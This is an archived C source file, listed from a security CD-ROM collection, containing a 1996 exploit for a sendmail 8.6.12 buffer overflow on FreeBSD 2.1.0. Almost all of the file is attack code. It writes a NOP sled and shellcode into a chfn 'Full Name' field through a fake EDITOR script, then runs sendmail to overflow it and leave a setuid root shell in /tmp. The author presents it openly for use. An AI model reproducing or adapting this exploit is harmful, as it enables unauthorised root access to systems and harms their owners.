home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / freebsdmail.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.4 KB  |  66 lines
  1. /*                               Hi !                                       */
  2. /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0).     */
  3. /* If you have any problems with it, send letter to me.                     */
  4. /*                             Have fun !                             
  5. /* -----------------   Dedicated to my beautiful lady   ------------------  */
  6. /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su           
  7.  
  8. #include <stdio.h>
  9. main()
  10. {
  11.   void make_files();
  12.   make_files();
  13.   system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
  14.          echo See result in /tmp");
  15. }
  16.  
  17. void make_files()
  18. {
  19.   int i,j;
  20.   FILE *f;
  21.   char nop_string[200];
  22.   char code_string[]=
  23.     {
  24.       "\xeb\x50"                         /* jmp    cont */
  25.       /* geteip: */
  26.       "\x5d"                             /* popl   %ebp */
  27.       "\x55"                             /* pushl  %ebp */
  28.       "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
  29.       "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
  30.       "\xc3"                             /* ret */
  31.       /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
  32.       /* 0xffffffc3(%ebp): */ "\x3c"
  33.       "chmod a=rsx /tmp/sh"              /* 0xffffffd7(%ebp): */
  34.       "\x01"
  35.       "-leshka-leshka-leshka-leshka-"    /* reserved */
  36.       /* cont:  */
  37.       "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
  38.       "\xe8\xa5\xff\xff\xff"             /* call   geteip */
  39.       "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4ffffff,%ebp */
  40.       "\x55"                             /* pushl  %ebp */
  41.       "\x55"                             /* pushl  %ebp */
  42.       "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0 */
  43.       "\xc3"                             /* ret */
  44.       "-leshka-leshka-leshka-leshka-"    /* reserved */
  45.       "\xa0\xcf\xbf\xef"
  46.     };
  47.  
  48.   j=269-sizeof(code_string);
  49.   for(i=0;i<j;nop_string[i++]='\x90');
  50.   nop_string[j]='\0';
  51.  
  52.   f=fopen("user.inf","w");
  53.   fprintf(f,"#Changing user database information for leshka\n");
  54.   fprintf(f,"Shell: /usr/local/bin/bash\n");
  55.   fprintf(f,"Location: \n");
  56.   fprintf(f,"Office Phone: \n");
  57.   fprintf(f,"Home Phone: \n");
  58.   fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
  59.   fclose(f);
  60.  
  61.   f=fopen("hack","w");
  62.   fprintf(f,"cat user.inf>\"$1\"\n");
  63.   fprintf(f,"touch -t 2510711313 \"$1\"\n");
  64.   fclose(f);
  65. }
  66. /*                    www.hack.co.za              [2000]*/